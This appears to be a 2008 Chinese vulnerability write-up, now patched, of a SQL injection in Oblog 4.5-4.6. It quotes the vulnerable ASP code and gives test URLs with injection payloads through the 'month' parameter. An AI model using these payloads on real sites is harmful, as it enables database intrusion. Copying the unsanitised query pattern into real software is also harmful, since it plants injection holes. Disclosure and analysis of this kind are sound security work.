首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >网络安全 >漏洞分析 >Oblog最新注入漏洞分析(已修补)
Oblog最新注入漏洞分析(已修补)
摘要:Date:2008-5-15Author:Yamato[BCT]Version:Oblog4.5-4.6sql代码分析:文件In/Class...

Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName = G_P_FileName & "month&month=" & strMonth strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01" mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then LastDay = "31"…… Else //第109行 SqlPart = " And Addtime >=’"&strMonth&"01’ AND Addtime < ’"&strMonth&LastDay&"’ " 构造合适的变量strMonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为: http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.Open strSql,Conn,1,1 不能修改记录集.

【Oblog最新注入漏洞分析(已修补)】相关文章:

又拍图片管家支付非法充值的漏洞分析及修复方法(图)

Unix主机安全漏洞分析

讯时后台管理系统v4.9的鸡肋漏洞分析

Discuz!NT 2.5最新注入漏洞测试分析(图)

IPB2注入漏洞的深入利用

恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞

DISCUZ X1.5 本地文件包含漏洞说明

BBSXP绕过过滤继续注入漏洞分析

Ghost有漏洞 镜像恢复需小心陷阱

BBSXP2008存在后台注射漏洞

上一篇: Discuz!!论坛wap功能模块编码的注射漏洞分析
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
网络安全子分类
最新漏洞分析学习
热门漏洞分析学习